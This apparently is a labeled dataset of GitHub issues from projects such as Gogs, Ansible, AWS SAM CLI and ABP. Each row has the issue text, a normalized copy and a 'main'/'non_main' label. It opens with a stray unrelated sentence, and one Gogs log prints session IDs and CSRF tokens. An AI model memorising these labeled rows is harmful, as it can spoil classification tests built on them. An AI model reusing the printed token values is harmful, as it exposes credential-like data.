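Dropping the pre-constexpr path also removes the subtle difference where `XM_CONSTEXPR` expanded to nothing on old compilers, silently demoting compile-time evaluation to runtime.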
3,317
12,876,713,182
IssuesEvent
2020-07-11 06:40:35
pychess/pychess
https://api.github.com/repos/pychess/pychess
closed
Create __doc__ strings
Easy-Fix Maintainability task
Original [issue 89](https://code.google.com/p/pychess/issues/detail?id=89) reported by [lobais](https://code.google.com/u/lobais/) 2006-11-21 PyChess needs better documentation. It should be added by creating a __doc__ string in most methods and functions, e.g.: def function (): """ This is documentation This function does no good. """
True
Create __doc__ strings - Original [issue 89](https://code.google.com/p/pychess/issues/detail?id=89) reported by [lobais](https://code.google.com/u/lobais/) 2006-11-21 PyChess needs better documentation. It should be added by creating a __doc__ string in most methods and functions, e.g.: def function (): """ This is documentation This function does no good. """
main
create doc strings original reported by pychess needs better documentation it should be added by creating a doc string in most methods and functions e g def function this is documentation this function does no good
1
727
4,318,962,149
IssuesEvent
2016-07-24 11:08:22
gogits/gogs
https://api.github.com/repos/gogits/gogs
closed
Change Owner of Repository, Whitescreen
kind/bug kind/ui status/assigned to maintainer status/needs feedback
- Gogs version (or commit ref): 0.9.28.0527 - Git version: git version 2.6.4 (Apple Git-63) - Operating system: Mac OSX - Database: - [ ] PostgreSQL - [ ] MySQL - [x] SQLite - Can you reproduce the bug at http://try.gogs.io: - [ ] Yes (provide example URL) - [X] No - [ ] Not relevant - Log gist: https://gist.github.com/shyim/763f4c8ca24c8271b4758550e19fd553 ``` Macaron] 2016-05-31 16:33:13: Started POST /org/company.domain/settings for 192.168.2.67 2016/05/31 16:33:13 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:13 [D] CSRF Token: XH8AjUqzTi4035s5jpLPcM1GFvw6MTQ2NDcwNTE5MzEyNDEzNDAzNw== [Macaron] 2016-05-31 16:33:13: Completed /org/company.domain/settings 400 Bad Request in 1.511108ms [Macaron] 2016-05-31 16:33:13: Started GET /favicon.ico for 192.168.2.67 2016/05/31 16:33:13 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:13 [D] CSRF Token: mrc4c20J9sCCL3qsw5gI5hxHG5c6MTQ2NDcwNTE5MzI4NTMxNzg1OQ== [Macaron] 2016-05-31 16:33:13: Completed /favicon.ico 302 Found in 968.711µs [Macaron] 2016-05-31 16:33:13: Started GET /user/login for 192.168.2.67 2016/05/31 16:33:13 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:13 [D] CSRF Token: mrc4c20J9sCCL3qsw5gI5hxHG5c6MTQ2NDcwNTE5MzI4NTMxNzg1OQ== [Macaron] 2016-05-31 16:33:13: Completed /user/login 302 Found in 1.608576ms [Macaron] 2016-05-31 16:33:13: Started GET /favicon.ico for 192.168.2.67 2016/05/31 16:33:13 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:13 [D] CSRF Token: VQi30nyIhYWXnaEr78ZvwiOwOa86MTQ2NDcwNTE5MzI5ODczMTUzOA== [Macaron] 2016-05-31 16:33:13: Completed /favicon.ico 200 OK in 1.988945ms [Macaron] 2016-05-31 16:33:18: Started GET /org/company.domain/settings for 192.168.2.67 2016/05/31 16:33:18 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:18 [D] CSRF Token: VQi30nyIhYWXnaEr78ZvwiOwOa86MTQ2NDcwNTE5MzI5ODczMTUzOA== 2016/05/31 16:33:18 [D] Template: repo/settings/options [Macaron] 2016-05-31 16:33:18: Completed /org/company.domain/settings 200 OK in 93.066483ms [Macaron] 2016-05-31 16:33:27: 
Started POST /org/company.domain/settings for 192.168.2.67 2016/05/31 16:33:27 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:27 [D] CSRF Token: VQi30nyIhYWXnaEr78ZvwiOwOa86MTQ2NDcwNTE5MzI5ODczMTUzOA== [Macaron] 2016-05-31 16:33:27: Completed /org/company.domain/settings 404 Not Found in 84.603122ms ``` ## Description Open a Repository in an Organization, go to Settings and move the Repository to another Organization
True
Change Owner of Repository, Whitescreen - - Gogs version (or commit ref): 0.9.28.0527 - Git version: git version 2.6.4 (Apple Git-63) - Operating system: Mac OSX - Database: - [ ] PostgreSQL - [ ] MySQL - [x] SQLite - Can you reproduce the bug at http://try.gogs.io: - [ ] Yes (provide example URL) - [X] No - [ ] Not relevant - Log gist: https://gist.github.com/shyim/763f4c8ca24c8271b4758550e19fd553 ``` Macaron] 2016-05-31 16:33:13: Started POST /org/company.domain/settings for 192.168.2.67 2016/05/31 16:33:13 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:13 [D] CSRF Token: XH8AjUqzTi4035s5jpLPcM1GFvw6MTQ2NDcwNTE5MzEyNDEzNDAzNw== [Macaron] 2016-05-31 16:33:13: Completed /org/company.domain/settings 400 Bad Request in 1.511108ms [Macaron] 2016-05-31 16:33:13: Started GET /favicon.ico for 192.168.2.67 2016/05/31 16:33:13 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:13 [D] CSRF Token: mrc4c20J9sCCL3qsw5gI5hxHG5c6MTQ2NDcwNTE5MzI4NTMxNzg1OQ== [Macaron] 2016-05-31 16:33:13: Completed /favicon.ico 302 Found in 968.711µs [Macaron] 2016-05-31 16:33:13: Started GET /user/login for 192.168.2.67 2016/05/31 16:33:13 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:13 [D] CSRF Token: mrc4c20J9sCCL3qsw5gI5hxHG5c6MTQ2NDcwNTE5MzI4NTMxNzg1OQ== [Macaron] 2016-05-31 16:33:13: Completed /user/login 302 Found in 1.608576ms [Macaron] 2016-05-31 16:33:13: Started GET /favicon.ico for 192.168.2.67 2016/05/31 16:33:13 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:13 [D] CSRF Token: VQi30nyIhYWXnaEr78ZvwiOwOa86MTQ2NDcwNTE5MzI5ODczMTUzOA== [Macaron] 2016-05-31 16:33:13: Completed /favicon.ico 200 OK in 1.988945ms [Macaron] 2016-05-31 16:33:18: Started GET /org/company.domain/settings for 192.168.2.67 2016/05/31 16:33:18 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:18 [D] CSRF Token: VQi30nyIhYWXnaEr78ZvwiOwOa86MTQ2NDcwNTE5MzI5ODczMTUzOA== 2016/05/31 16:33:18 [D] Template: repo/settings/options [Macaron] 2016-05-31 16:33:18: Completed /org/company.domain/settings 200 OK in 
93.066483ms [Macaron] 2016-05-31 16:33:27: Started POST /org/company.domain/settings for 192.168.2.67 2016/05/31 16:33:27 [D] Session ID: a38a9b1ff63b97fe 2016/05/31 16:33:27 [D] CSRF Token: VQi30nyIhYWXnaEr78ZvwiOwOa86MTQ2NDcwNTE5MzI5ODczMTUzOA== [Macaron] 2016-05-31 16:33:27: Completed /org/company.domain/settings 404 Not Found in 84.603122ms ``` ## Description Open a Repository in an Organization, go to Settings and move the Repository to another Organization
main
change owner of repository whitescreen gogs version or commit ref git version git version apple git operating system mac osx database postgresql mysql sqlite can you reproduce the bug at yes provide example url no not relevant log gist macaron started post org company domain settings for session id csrf token completed org company domain settings bad request in started get favicon ico for session id csrf token completed favicon ico found in started get user login for session id csrf token completed user login found in started get favicon ico for session id csrf token completed favicon ico ok in started get org company domain settings for session id csrf token template repo settings options completed org company domain settings ok in started post org company domain settings for session id csrf token completed org company domain settings not found in description open a repository in a organization go to settings and move the repository to a another organization
1
3,202
12,229,251,272
IssuesEvent
2020-05-03 23:14:26
backdrop-ops/contrib
https://api.github.com/repos/backdrop-ops/contrib
closed
Application to join: rositis
Maintainer application Port in progress
**The name of your module, theme, or layout** Hook Post Action **Post a link here to an issue in the drupal.org queue notifying Drupal 7 maintainers that you are working on a Backdrop port of their project** https://www.drupal.org/project/hook_post_action/issues/3130683 **Do you agree to the [Backdrop Contributed Project Agreement](https://github.com/backdrop-ops/contrib#backdrop-contributed-project-agreement)** Yes **Post a link to your new Backdrop project under your own GitHub account** https://github.com/rositis/hook_post_action Once we have a chance to review your project, we may provide feedback that's meant to be helpful. If everything checks out, you will be invited to the @backdrop-contrib group, and will be able to transfer the project 😉
True
Application to join: rositis - **The name of your module, theme, or layout** Hook Post Action **Post a link here to an issue in the drupal.org queue notifying Drupal 7 maintainers that you are working on a Backdrop port of their project** https://www.drupal.org/project/hook_post_action/issues/3130683 **Do you agree to the [Backdrop Contributed Project Agreement](https://github.com/backdrop-ops/contrib#backdrop-contributed-project-agreement)** Yes **Post a link to your new Backdrop project under your own GitHub account** https://github.com/rositis/hook_post_action Once we have a chance to review your project, we may provide feedback that's meant to be helpful. If everything checks out, you will be invited to the @backdrop-contrib group, and will be able to transfer the project 😉
main
application to join rositis the name of your module theme or layout hook post action post a link here to an issue in the drupal org queue notifying drupal maintainers that you are working on a backdrop port of their project do you agree to the yes post a link to your new backdrop project under your own github account once we have a chance to review your project we may provide feedback that s meant to be helpful if everything checks out you will be invited to the backdrop contrib group and will be able to transfer the project 😉
1
709
4,287,788,788
IssuesEvent
2016-07-17 00:51:16
gogits/gogs
https://api.github.com/repos/gogits/gogs
closed
Did not validate attributes fetch from LDAP
kind/bug status/assigned to maintainer status/needs feedback
## Description - Gogs version (or commit ref): 0.8.25 - Git version: 1.9.1 - Operating system: Ubuntu 14.04.4 LTS - Database: MySQL - Auth type: Simple auth - User DN: `cn=%s,ou=people,dc=test,dc=com` - User Filter: `(cn=%s)` - Username attribute: `displayName` **[Step to reproduce]** 1. Config the Gogs v0.8.25 with OpenLDAP simple auth. 2. Config the `Username attribute` with a ldap entry which can return value with white space e.g. `displayName` 3. Log in Gogs with a user which has white space in `displayName`field. **[Expect result]** user cannot log in **[Actual result]** user can login **[Parent issue]** https://github.com/gogits/gogs/issues/2709
True
Did not validate attributes fetch from LDAP - ## Description - Gogs version (or commit ref): 0.8.25 - Git version: 1.9.1 - Operating system: Ubuntu 14.04.4 LTS - Database: MySQL - Auth type: Simple auth - User DN: `cn=%s,ou=people,dc=test,dc=com` - User Filter: `(cn=%s)` - Username attribute: `displayName` **[Step to reproduce]** 1. Config the Gogs v0.8.25 with OpenLDAP simple auth. 2. Config the `Username attribute` with a ldap entry which can return value with white space e.g. `displayName` 3. Log in Gogs with a user which has white space in `displayName`field. **[Expect result]** user cannot log in **[Actual result]** user can login **[Parent issue]** https://github.com/gogits/gogs/issues/2709
main
did not validate attributes fetch from ldap description gogs version or commit ref git version operating system ubuntu lts database mysql auth type simple auth user dn cn s ou people dc test dc com user filter cn s username attribute displayname config the gogs with openldap simple auth config the username attribute with a ldap entry which can return value with white space e g displayname log in gogs with a user which has white space in displayname field user cannot log in user can login
1
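The Gogs record above reports that an LDAP-supplied username attribute (`displayName` containing whitespace) was accepted without validation. A hedged sketch of the kind of check the report implies — `is_valid_username` is a hypothetical helper, not Gogs code:

```cpp
#include <cassert>
#include <cctype>
#include <string>

// Hypothetical validator for an LDAP-supplied username attribute:
// reject empty values and values containing any whitespace, which is
// what the report expects for a `displayName`-backed username.
bool is_valid_username(const std::string& name) {
    if (name.empty()) return false;
    for (unsigned char c : name) {
        if (std::isspace(c)) return false;
    }
    return true;
}
```

The expected behavior in the report ("user cannot log in") corresponds to rejecting the login when this check fails, rather than trusting whatever the directory returns.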
1,230
5,245,589,845
IssuesEvent
2017-02-01 05:21:39
ansible/ansible-modules-extras
https://api.github.com/repos/ansible/ansible-modules-extras
closed
timezone cannot change timezone in systemd based containers
affects_2.2 bug_report waiting_on_maintainer
In my playbook, I got the following: ``` - name: Set timezone to CEST. timezone: name: Europe/Berlin when: "'{{ansible_virtualization_role}}' != 'guest'" ``` The condition was added as a workaround, because in the Debian Stretch, systemd based LXC container, timedatectl reports: > Failed to create bus connection: No such file or directory This is likely because systemd-timesyncd and systemd-timedated are disabled in virtual machines, but Ansible insists on using them to change the timezone. ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME - timezone ##### ANSIBLE VERSION <!--- Paste verbatim output from “ansible --version” between quotes below --> ``` ansible 2.2.0.0 config file = /etc/ansible/ansible.cfg configured module search path = Default w/o overrides ``` ##### CONFIGURATION ``` - name: Set timezone to CEST. timezone: name: Europe/Berlin ``` ##### OS / ENVIRONMENT Running on Debian Testing, managing Debian Testing container running under LXC on Turris Omnia, OpenWRT kernel. ##### SUMMARY Changing the timezone is definitely possible without timedatectl. It could also be that Debian falsely disables systemd-timedated inside the container when there is virtualization, of that I am not entirely sure. ##### STEPS TO REPRODUCE Use example above on LXC Debian Stretch container. ##### EXPECTED RESULTS Expected to change /etc/timezone ##### ACTUAL RESULTS Crashed ansible playbook.
True
timezone cannot change timezone in systemd based containers - In my playbook, I got the following: ``` - name: Set timezone to CEST. timezone: name: Europe/Berlin when: "'{{ansible_virtualization_role}}' != 'guest'" ``` The condition was added as a workaround, because in the Debian Stretch, systemd based LXC container, timedatectl reports: > Failed to create bus connection: No such file or directory This is likely because systemd-timesyncd and systemd-timedated are disabled in virtual machines, but Ansible insists on using them to change the timezone. ##### ISSUE TYPE - Bug Report ##### COMPONENT NAME - timezone ##### ANSIBLE VERSION <!--- Paste verbatim output from “ansible --version” between quotes below --> ``` ansible 2.2.0.0 config file = /etc/ansible/ansible.cfg configured module search path = Default w/o overrides ``` ##### CONFIGURATION ``` - name: Set timezone to CEST. timezone: name: Europe/Berlin ``` ##### OS / ENVIRONMENT Running on Debian Testing, managing Debian Testing container running under LXC on Turris Omnia, OpenWRT kernel. ##### SUMMARY Changing the timezone is definitely possible without timedatectl. It could also be that Debian falsely disables systemd-timedated inside the container when there is virtualization, of that I am not entirely sure. ##### STEPS TO REPRODUCE Use example above on LXC Debian Stretch container. ##### EXPECTED RESULTS Expected to change /etc/timezone ##### ACTUAL RESULTS Crashed ansible playbook.
main
timezone cannot change timezone in systemd based containers in my playbook i got the following name set timezone to cest timezone name europe berlin when ansible virtualization role guest the condition was added as a workaround because in the debian stretch systemd based lxc container timedatectl reports failed to create bus connection no such file or directory this is likely because systemd timesyncd and systemd timedated are disabled in virtual machines but ansible insists on using them to change the timezone issue type bug report component name timezone ansible version ansible config file etc ansible ansible cfg configured module search path default w o overrides configuration name set timezone to cest timezone name europe berlin os environment running on debian testing managing debian testing container running under lxc on turris omnia openwrt kernel summary changing the timezone is definitely possible without timedatectl it could also be that debian falsely disables systemd timedated inside the container when there is virtualization of that i am not entirely sure steps to reproduce use example above on lxc debian stretch container expected results expected to change etc timezone actual results crashed ansible playbook
1
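The Ansible record above notes that changing the timezone is possible without `timedatectl`: the fallback amounts to writing the zone name to `/etc/timezone` and repointing the `/etc/localtime` symlink at the zoneinfo entry. A hedged sketch of that fallback — paths are parameterized to a scratch root so the logic can run outside a real `/etc`, and this is not Ansible's actual implementation:

```cpp
#include <cassert>
#include <filesystem>
#include <fstream>
#include <string>

namespace fs = std::filesystem;

// Non-timedatectl fallback: record the zone name in <root>/etc/timezone
// and symlink <root>/etc/localtime to the matching zoneinfo file.
void set_timezone(const fs::path& root, const std::string& zone) {
    fs::create_directories(root / "etc");
    std::ofstream(root / "etc" / "timezone") << zone << '\n';
    const fs::path localtime = root / "etc" / "localtime";
    fs::remove(localtime);  // drop any existing link before relinking
    fs::create_symlink("/usr/share/zoneinfo/" + zone, localtime);
}
```

In a container without a D-Bus connection this file-level approach keeps working, which is why the playbook's `ansible_virtualization_role` guard is only a workaround rather than a fix.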
692,441
23,734,880,988
IssuesEvent
2022-08-31 07:10:12
dodona-edu/dodona
https://api.github.com/repos/dodona-edu/dodona
closed
Link to the manual where possible
feature student low priority
We should take a look at the manual pages we have an think where on Dodona we could link to those pages. For example: every markdown text area should have a link to the markdown docs.
1.0
Link to the manual where possible - We should take a look at the manual pages we have an think where on Dodona we could link to those pages. For example: every markdown text area should have a link to the markdown docs.
non_main
link to the manual where possible we should take a look at the manual pages we have an think where on dodona we could link to those pages for example every markdown text area should have a link to the markdown docs
0
248,867
18,858,128,777
IssuesEvent
2021-11-12 09:25:01
kengjit/pe
https://api.github.com/repos/kengjit/pe
opened
UG - Flow was confusing
severity.Low type.DocumentationBug
There were multiple instances where Lessons/Modules were referenced before they were explained. This might confuse the reader as they do not know what they are. Refer to pg 6, 8 ![image.png](https://raw.githubusercontent.com/kengjit/pe/main/files/ef416445-8907-4396-adf7-59c998154e01.png) ![image.png](https://raw.githubusercontent.com/kengjit/pe/main/files/bdaee591-88ef-4f95-95d0-216023384d60.png) <!--session: 1636703410529-d12d539c-8c6d-4415-bfa1-4aeef6033363--> <!--Version: Web v3.4.1-->
1.0
UG - Flow was confusing - There were multiple instances where Lessons/Modules were referenced before they were explained. This might confuse the reader as they do not know what they are. Refer to pg 6, 8 ![image.png](https://raw.githubusercontent.com/kengjit/pe/main/files/ef416445-8907-4396-adf7-59c998154e01.png) ![image.png](https://raw.githubusercontent.com/kengjit/pe/main/files/bdaee591-88ef-4f95-95d0-216023384d60.png) <!--session: 1636703410529-d12d539c-8c6d-4415-bfa1-4aeef6033363--> <!--Version: Web v3.4.1-->
non_main
ug flow was confusing there were multiple instances where lessons modules were referenced before they were explained this might confuse the reader as they do not know what they are refer to pg
0
4,369
22,155,343,109
IssuesEvent
2022-06-03 21:51:32
aws/aws-sam-cli
https://api.github.com/repos/aws/aws-sam-cli
reopened
Unable to create Serverless API using SAM v1.40.0
stage/bug-repro maintainer/need-followup
<!-- Make sure we don't have an existing Issue that reports the bug you are seeing (both open and closed). If you do find an existing Issue, re-open or add a comment to that Issue instead of creating a new one. --> ### Description: <!-- Briefly describe the bug you are facing.--> I tried creating a SAM application using the quick start template for serverless API, but unfortunately it complains that it's unable to local the quickstart-web template. ### Steps to reproduce: <!-- Provide detailed steps to replicate the bug, including steps from third party tools (CDK, etc.) --> ``` D:\Projects λ sam init You can preselect a particular runtime or package type when using the `sam init` experience. Call `sam init --help` to learn more. Which template source would you like to use? 1 - AWS Quick Start Templates 2 - Custom Template Location Choice: 1 Choose an AWS Quick Start application template 1 - Hello World Example 2 - Multi-step workflow 3 - Serverless API 4 - Scheduled task 5 - Standalone function 6 - Data processing 7 - Infrastructure event management 8 - Machine Learning Template: 3 Which runtime would you like to use? 1 - dotnetcore3.1 2 - nodejs14.x 3 - nodejs12.x 4 - python3.9 5 - python3.8 Runtime: 2 Based on your selections, the only Package type available is Zip. We will proceed to selecting the Package type as Zip. Based on your selections, the only dependency manager available is npm. We will proceed copying the template using npm. Project name [sam-app]: sammy Cloning from https://github.com/aws/aws-sam-cli-app-templates (process may take a moment) Error: Can't find application template quick-start-web - check valid values in interactive init. ``` ### Observed result: <!-- Please provide command output with `--debug` flag set. --> **Error: Can't find application template quick-start-web - check valid values in interactive init.** ### Expected result: <!-- Describe what you expected. 
--> I expected it to create Serverless API project with it's default scaffolding. ### Additional environment details (Ex: Windows, Mac, Amazon Linux etc) 1. OS: Windows 10 Pro 2. `sam --version`: SAM CLI, version 1.40.0 3. AWS region: us-east-2
True
Unable to create Serverless API using SAM v1.40.0 - <!-- Make sure we don't have an existing Issue that reports the bug you are seeing (both open and closed). If you do find an existing Issue, re-open or add a comment to that Issue instead of creating a new one. --> ### Description: <!-- Briefly describe the bug you are facing.--> I tried creating a SAM application using the quick start template for serverless API, but unfortunately it complains that it's unable to local the quickstart-web template. ### Steps to reproduce: <!-- Provide detailed steps to replicate the bug, including steps from third party tools (CDK, etc.) --> ``` D:\Projects λ sam init You can preselect a particular runtime or package type when using the `sam init` experience. Call `sam init --help` to learn more. Which template source would you like to use? 1 - AWS Quick Start Templates 2 - Custom Template Location Choice: 1 Choose an AWS Quick Start application template 1 - Hello World Example 2 - Multi-step workflow 3 - Serverless API 4 - Scheduled task 5 - Standalone function 6 - Data processing 7 - Infrastructure event management 8 - Machine Learning Template: 3 Which runtime would you like to use? 1 - dotnetcore3.1 2 - nodejs14.x 3 - nodejs12.x 4 - python3.9 5 - python3.8 Runtime: 2 Based on your selections, the only Package type available is Zip. We will proceed to selecting the Package type as Zip. Based on your selections, the only dependency manager available is npm. We will proceed copying the template using npm. Project name [sam-app]: sammy Cloning from https://github.com/aws/aws-sam-cli-app-templates (process may take a moment) Error: Can't find application template quick-start-web - check valid values in interactive init. ``` ### Observed result: <!-- Please provide command output with `--debug` flag set. --> **Error: Can't find application template quick-start-web - check valid values in interactive init.** ### Expected result: <!-- Describe what you expected. 
--> I expected it to create Serverless API project with it's default scaffolding. ### Additional environment details (Ex: Windows, Mac, Amazon Linux etc) 1. OS: Windows 10 Pro 2. `sam --version`: SAM CLI, version 1.40.0 3. AWS region: us-east-2
main
unable to create serverless api using sam make sure we don t have an existing issue that reports the bug you are seeing both open and closed if you do find an existing issue re open or add a comment to that issue instead of creating a new one description i tried creating a sam application using the quick start template for serverless api but unfortunately it complains that it s unable to local the quickstart web template steps to reproduce d projects λ sam init you can preselect a particular runtime or package type when using the sam init experience call sam init help to learn more which template source would you like to use aws quick start templates custom template location choice choose an aws quick start application template hello world example multi step workflow serverless api scheduled task standalone function data processing infrastructure event management machine learning template which runtime would you like to use x x runtime based on your selections the only package type available is zip we will proceed to selecting the package type as zip based on your selections the only dependency manager available is npm we will proceed copying the template using npm project name sammy cloning from process may take a moment error can t find application template quick start web check valid values in interactive init observed result error can t find application template quick start web check valid values in interactive init expected result i expected it to create serverless api project with it s default scaffolding additional environment details ex windows mac amazon linux etc os windows pro sam version sam cli version aws region us east
1
444,476
12,813,397,163
IssuesEvent
2020-07-04 12:45:16
abpframework/abp
https://api.github.com/repos/abpframework/abp
closed
Try to consume both of REST and gRPC services from the console client of the gRPC demo sample
abp-framework abp-samples priority:high
I created the sample: https://github.com/abpframework/abp-samples/tree/master/GrpcDemo It works. However, we have a problem: [Microsoft document](https://docs.microsoft.com/en-us/aspnet/core/tutorials/grpc/grpc-start) leads to make the server to support HTTP/2. However, client application can not call REST endpoints in this case. I couldn't be able to configure all HttpClients (those used to authenticate to IDS4 and call REST endpoints) to use Http/2. There are [solutions](https://stackoverflow.com/questions/32685151/how-to-make-the-net-httpclient-use-http-2-0) on the web, but I didn't spend much time to be honest. I disabled the related lines: https://github.com/abpframework/abp-samples/blob/master/GrpcDemo/test/GrpcDemo.HttpApi.Client.ConsoleTestApp/ConsoleTestAppHostedService.cs#L28 @maliming can you look at that. Thanks.
1.0
Try to consume both of REST and gRPC services from the console client of the gRPC demo sample - I created the sample: https://github.com/abpframework/abp-samples/tree/master/GrpcDemo It works. However, we have a problem: [Microsoft document](https://docs.microsoft.com/en-us/aspnet/core/tutorials/grpc/grpc-start) leads to make the server to support HTTP/2. However, client application can not call REST endpoints in this case. I couldn't be able to configure all HttpClients (those used to authenticate to IDS4 and call REST endpoints) to use Http/2. There are [solutions](https://stackoverflow.com/questions/32685151/how-to-make-the-net-httpclient-use-http-2-0) on the web, but I didn't spend much time to be honest. I disabled the related lines: https://github.com/abpframework/abp-samples/blob/master/GrpcDemo/test/GrpcDemo.HttpApi.Client.ConsoleTestApp/ConsoleTestAppHostedService.cs#L28 @maliming can you look at that. Thanks.
non_main
try to consume both of rest and grpc services from the console client of the grpc demo sample i created the sample it works however we have a problem leads to make the server to support http however client application can not call rest endpoints in this case i couldn t be able to configure all httpclients those used to authenticate to and call rest endpoints to use http there are on the web but i didn t spend much time to be honest i disabled the related lines maliming can you look at that thanks
0
3,972
18,268,290,969
IssuesEvent
2021-10-04 11:03:53
restqa/restqa
https://api.github.com/repos/restqa/restqa
closed
Create custom step definition
enhancement pair with maintainer
Hello 👋, ### 👀 Background User has different need and most of the time the step definition provided by RestQA can't fully cover the user requirement. ### ✌️ What is the actual behavior? The user could use the default step definition coming with restqa. ### 🕵️‍♀️ How to reproduce the current behavior? 1. Install RestQA 2. Run the command `restqa init` to initialize a brand new project 3. Run the command `restqa steps` to take a look at the list of steps available. ### 🤞 What is the expected behavior? On some team setup we would prefer to create a specific step definition, such as inserting or deleting data from a custom system. ### 😎 Proposed solution. On the `.restqa.yml` configuration file , we could add the property `stepFiles` in the object `restqa` such as : ```yaml restqa: stepFiles: - tests/steps.js ``` The stepFiles property should include an array of filename. Each referenced file should have a specific format, example : ```js module.exports = function (cucumber) { cucumber.Given('my step', () => console.log('do Something'), 'My step definition description', 'custom tag') } ``` Cheers.
index: True
label: main
binary_label: 1
210,915
16,396,150,591
IssuesEvent
2021-05-18 00:04:43
fga-eps-mds/MDS-2020-2-G9
https://api.github.com/repos/fga-eps-mds/MDS-2020-2-G9
closed
Atualizar o Roadmap
documentation organização
### Description (translated from Portuguese): Add sprints 12 and 13 ### Goals: - [x] sprint 12 - [x] sprint 13 - [x] fix errors
index: 1.0
label: non_main
binary_label: 0
Unnamed: 0: 4,531
id: 23,548,869,449
type: IssuesEvent
created_at: 2022-08-21 14:30:18
repo: web3phl/directory
repo_url: https://api.github.com/repos/web3phl/directory
action: opened
title: info/faq page
labels: docs feature maintainers only todo
### 🤔 Not Existing Feature Request? - [X] Yes, I'm sure, this is a new requested feature! ### 🤔 Not an Idea or Suggestion? - [X] Yes, I'm sure, this is not idea or suggestion! ### 📋 Request Details Good to have an info or faq page where people are able to see this first before the directory list. Let's make this priority! 💪 ### 📜 Code of Conduct - [X] I agree to follow this project's [Code of Conduct](https://github.com/web3phl/directory/blob/main/CODE_OF_CONDUCT.md).
index: True
label: main
binary_label: 1
Unnamed: 0: 5,507
id: 27,493,360,763
type: IssuesEvent
created_at: 2023-03-04 22:07:42
repo: Windham-High-School/CubeServer
repo_url: https://api.github.com/repos/Windham-High-School/CubeServer
action: opened
title: Make raspi mongo container
labels: enhancement maintainability
Make a separate repo with a script for grabbing the latest version of a given release of mongodb from github, building, and pushing to docker hub for use with CubeServer on a raspi with arm64v8<8.2
index: True
label: main
binary_label: 1
Unnamed: 0: 62,127
id: 17,023,856,194
type: IssuesEvent
created_at: 2021-07-03 04:12:21
repo: tomhughes/trac-tickets
repo_url: https://api.github.com/repos/tomhughes/trac-tickets
action: closed
title: Latitude/longitude text overflow
labels: Component: potlatch2 Priority: minor Resolution: duplicate Type: defect
**[Submitted to the original trac issue database at 11.47pm, Wednesday, 6th March 2013]** Under options, you can select Show mouse latitude/longitude When the numeric value of the longitude exceeds -99 degrees, the latitude drops out of the window. The window appears to have room for the sign, 2 digits,a decimal, and 5 digits. ``` -78.07526 48.42046 ``` When the longitude exceeds 99 degrees, the sign stays on the first line, and the longitude value gets bumped to the second line, and the latitude is no longer visible ``` - 113.54634 ``` Positive longitude values are not affected, only negative values over 99 degrees. Negative latitude values are fine as they can not exceed 90.
index: 1.0
label: non_main
binary_label: 0
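The overflow described in the record above is pure field-width arithmetic: a signed longitude with three integer digits and five decimals needs ten characters, one more than the nine-character field the reporter describes. A small check of that arithmetic (illustrative only, not code from Potlatch):

```python
def lon_width(lon: float) -> int:
    """Characters needed to print a longitude as sign + digits + 5 decimals."""
    return len(f"{lon:.5f}")

# The 9-character field from the report fits 2-digit negative longitudes...
assert lon_width(-78.07526) == 9
# ...but a 3-digit negative longitude needs 10 characters and wraps.
assert lon_width(-113.54634) == 10
# Positive 3-digit longitudes still fit, matching the reported behaviour.
assert lon_width(113.54634) == 9
```

This is consistent with the report that only negative longitudes past -99° are affected: latitude never exceeds 90, so it always fits.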
Unnamed: 0: 2,874
id: 10,276,059,346
type: IssuesEvent
created_at: 2019-08-24 14:00:13
repo: arcticicestudio/arctic
repo_url: https://api.github.com/repos/arcticicestudio/arctic
action: closed
title: Husky
labels: context-workflow scope-dx scope-maintainability scope-quality type-feature
<p align="center"><img src="https://user-images.githubusercontent.com/7836623/63638276-5970e900-c686-11e9-9de8-a54fc0a75b1b.png" width="20%" /></p> Integrate [Husky][gh-husky], the tool that make Git hooks easy and can prevent bad Git commits, pushes and more :dog: _woof_! ### Configuration The configuration file `.huskyrc.js` will be placed in the project root and includes the command to run for any [supported Git hook][gh-husky-docs-hooks]. It will at least contain configs for the following hooks: - `pre-commit` - Run `lint-staged` (GH-33) before each commit to ensure all staged files are compliant to all style guides. ## Tasks - [ ] Install [husky][npm-husky] package. - [ ] Implement `.huskyrc.js` configuration file. [gh-husky-docs-hooks]: https://github.com/typicode/husky/blob/master/DOCS.md#supported-hooks [gh-husky]: https://github.com/typicode/husky [npm-husky]: https://www.npmjs.com/package/husky
index: True
label: main
binary_label: 1
Unnamed: 0: 544,346
id: 15,892,568,548
type: IssuesEvent
created_at: 2021-04-11 00:45:14
repo: wso2/product-apim
repo_url: https://api.github.com/repos/wso2/product-apim
action: closed
title: Make the try out button call to action
labels: API-M 4.0.0 Priority/High React-UI T1 Type/Improvement
### Describe your problem(s) <!-- Describe why you think this project needs this feature --> ![image](https://user-images.githubusercontent.com/20179540/114185526-75142a80-9963-11eb-803a-57204bf066ee.png) ![image](https://user-images.githubusercontent.com/20179540/114213072-2a54db80-9980-11eb-964a-bf305d5531ba.png) ### Describe your solution <!-- Describe the feature/improvement --> ### How will you implement it <!-- If you like to suggest an approach or a design --> --- ### Optional Fields #### Related Issues: <!-- Any related issues from this/other repositories--> #### Suggested Labels: <!--Only to be used by non-members--> #### Suggested Assignees: <!--Only to be used by non-members-->
index: 1.0
label: non_main
binary_label: 0
Unnamed: 0: 2,453
id: 8,639,874,412
type: IssuesEvent
created_at: 2018-11-23 22:16:47
repo: F5OEO/rpitx
repo_url: https://api.github.com/repos/F5OEO/rpitx
action: closed
title: install.sh
labels: V1 related (not maintained)
WTF? Why there is `apt-get` in install.sh? This is totally incorrect. I am using Arch Linux ARM, for example. There is no `apt`. =)
index: True
label: main
binary_label: 1
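The portability complaint in the record above (a hard-coded `apt-get` in install.sh breaking on Arch Linux) is typically fixed by probing for whichever package manager is actually on PATH before installing anything. A minimal sketch of that probe — the helper name and manager list are illustrative, not taken from rpitx:

```python
import shutil

def pick_package_manager(which=shutil.which):
    """Return the first known package manager found on PATH, or None."""
    for pm in ("apt-get", "dnf", "pacman", "zypper"):
        if which(pm):
            return pm
    return None

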